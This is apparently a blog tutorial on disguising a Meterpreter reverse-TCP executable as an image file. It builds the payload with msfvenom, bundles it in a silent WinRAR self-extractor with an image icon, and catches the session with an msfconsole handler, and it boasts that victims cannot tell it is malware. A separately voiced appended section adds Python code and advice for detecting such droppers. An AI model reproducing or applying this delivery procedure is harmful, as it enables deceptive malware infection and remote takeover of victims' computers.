Thursday, 14 May 2020

HOW TO EMBED OR BIND PAYLOAD WITH AN IMAGE FILE TO GAIN ROOT ACCESS


SO HELLO GUYS,
TODAY I AM GOING TO SHOW YOU HOW YOU CAN EMBED AND BIND A PAYLOAD WITH AN IMAGE FILE AND HOW YOU CAN GET ROOT ACCESS AFTER THE PAYLOAD OR IMAGE IS EXECUTED. YES, I KNOW YOU HAVE A QUESTION IN YOUR MIND: AN IMAGE CANNOT BE EXECUTED. SO READ THE FULL ARTICLE OR WATCH THE VIDEO LINK ABOVE.

TOOLS WHICH I USED :

1. KALI 2020.1 ( FOR MAKING THE PAYLOAD )

2. IMAGE FILE

3. QUICK ANY2ICO ( TO CONVERT IMAGE FILE INTO AN ICON )

4. WINRAR ( USE TO BIND THE PAYLOAD WITH IMAGE FILE )

PROCEDURE :

1. OPEN KALI AND MAKE A PAYLOAD ( TO MAKE A PAYLOAD OPEN THE 

TERMINAL AND TYPE msfvenom -p windows/meterpreter/reverse_tcp lport=4444 

lhost=<YOUR IP> -e x86/shikata_ga_nai -f exe </root/Desktop/payload.exe ) AND 

DOWNLOAD THAT FILE ON THE WINDOWS MACHINE BY STARTING THE PYTHON 

SERVER ( TO START THE PYTHON SERVER WRITE THE COMMAND IN THE 

TERMINAL python -m SimpleHTTPServer 8080 ). AFTER RUNNING THE SERVER GO 

TO YOUR WINDOW MACHINE , OPEN THE BROWSER AND TYPE 

www.<YOUR IP>:8080 AND DOWNLOAD YOUR PAYLOAD FILE .

2.  NOW WE WILL MAKE AN ICON WITH IMAGE . TO MAKE AN ICON RUN QUICK 

ANY2ICO AS ADMINISTRATOR SELECT THE IMAGE FILE AND SELECT THE 

DESTINATION FILE WHERE YOU WANT TO SAVE THAT ICON.


3.  AFTER THE ICON HAS CREATED NOW LETS BIND OUR PAYLOAD , TO BIND THE 

PAYLOAD FOLLOW THE STEPS :

          -------- SELECT BOTH THE IMAGE FILE AND PAYLOAD FILE AND RIGHT CLICK ON IT AND SELECT ADD TO ARCHIVE .

          ---------NOW YOU WILL SEE A WINDOW IS POP UP AND SELECT THE
                      FOLLOWING OPTION 
                 A : COMPRESSION METHOD = BEST
                 
                 B : ARCHIVE FORMAT =ZIP
                 
                 C : ARCHIVING OPTION = CREATE SFX ARCHIVE
                 
                 D : CLICK ON ADVANCE OPTION FROM THE TOP MENU
             
                 E : CLICK ON SETUP AND YOU WILL SEE RUN AFTER EXTRACTION
                       COLUMN [ IN THAT WRITE BOTH THE PAYLOAD AS WELL AS THE
                       IMAGE FILE NAME WITH THEIR FORMAT SUCH AS .EXE AND .JPG.
                  
                 F :  NOW GO TO THE UPDATE OPTION AND YOU WILL SEE A OVERWRITE 
                        MODE FROM THERE AND SELECT SKIP EXISTING FILES 

                G : NOW GO TO TEXT AND ICON OPTIONS YOU WILL SEE A LOAD SFX
                       ICON OPTION THERE NOW CLICK ON BROWSE AND SELECT YOUR  
                       ICON FILE

                H : NOW GO TO MODE OPTION AND YOU WILL SEE A SILENT MODE MENU
                     AND FROM THERE SELECT HIDE ALL OPTION 

                I : NOW CLICK ON OK AND AGAIN CLICK ON OK.
  
       --------- ALL THE WORK HAS BEEN DONE JUST START THE LISTENING ON THE   
                    KALI MACHINE AND RUN THE ZIP FILE ( TO START THE LISTENING
                    TYPE THE FOLLOWING COMMANDS: )

                 J : OPEN THE TERMINAL AND TYPE THE FOLLOWING COMMANDS :       

                           1. msfconsole

                           2. use exploit/multi handler

                           3. set payload windows/meterpreter/reverse_tcp

                           4. set lport 4444 
                      
                           5. set lhost <YOUR IP>
        
                           6. exploit
                                                                                                                                     

                 H : ALL STEPS ARE DONE NOW JUST OPEN THE IMAGE AND YOU WILL
                       SEE THAT THE SESSION HAS COME AND YOU HAVE ALL THE ACCESS
                       OF THE FILES


SO IN THIS WAY GUYS YOU CAN BIND YOUR PAYLOAD WITH ANY IMAGE FILE AND THE VICTIM WILL NEVER BE ABLE TO TELL THAT THIS IS MALWARE.
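The file this procedure produces is still a Windows executable: a self-extractor stub followed by a ZIP archive whose SFX script names the programs to run after extraction and asks for no dialogs. The triage check below is an added example, not part of the original post. It assumes the script is stored as plain text in the ZIP archive comment and uses the WinRAR script keys `Setup`, `Silent=1` (hide all) and `Overwrite=2` (skip existing files); the member names and stub bytes in `build_sample` are constructed.

```python
import io
import re
import zipfile

EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1")

def triage_sfx(data: bytes) -> dict:
    """Flag a ZIP self-extractor whose script silently runs a program."""
    out = {"is_pe": data[:2] == b"MZ", "members": [], "setup": [],
           "silent": False, "skip_existing": False, "suspicious": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))  # tolerates a prepended stub
    except zipfile.BadZipFile:
        return out
    out["members"] = zf.namelist()
    # Assumption: the SFX script is plain text in the ZIP archive comment.
    for line in zf.comment.decode("utf-8", "replace").splitlines():
        m = re.match(r"\s*(\w+)\s*=\s*(.+)", line)
        if not m:
            continue  # blank lines and ';' comment lines
        key, val = m.group(1).lower(), m.group(2).strip().strip('"')
        if key == "setup" and val:
            out["setup"].append(val)
        elif key == "silent":
            out["silent"] = val == "1"
        elif key == "overwrite":
            out["skip_existing"] = val == "2"
    runs_exe = any(s.lower().split()[0].endswith(EXEC_EXT) for s in out["setup"])
    # Executable container + auto-run of a program + no dialogs shown.
    out["suspicious"] = out["is_pe"] and runs_exe and out["silent"]
    return out

def build_sample(script: str) -> bytes:
    """Constructed test input: a fake 'MZ' stub followed by a small ZIP."""
    buf = io.BytesIO()
    buf.write(b"MZ" + b"\x00" * 62)  # stand-in for the SFX module, not real code
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", b"\xff\xd8\xff constructed image bytes")
        zf.writestr("viewer.exe", b"constructed placeholder, not a program")
        zf.comment = script.encode()
    return buf.getvalue()

if __name__ == "__main__":
    bad = build_sample("Setup=viewer.exe\nSetup=holiday.jpg\nSilent=1\nOverwrite=2\n")
    print(triage_sfx(bad))
```

A hit means the "image" should be handled as an executable dropper; showing file extensions in Explorer exposes the same fact to the user, because the icon is the only thing that looks like a picture.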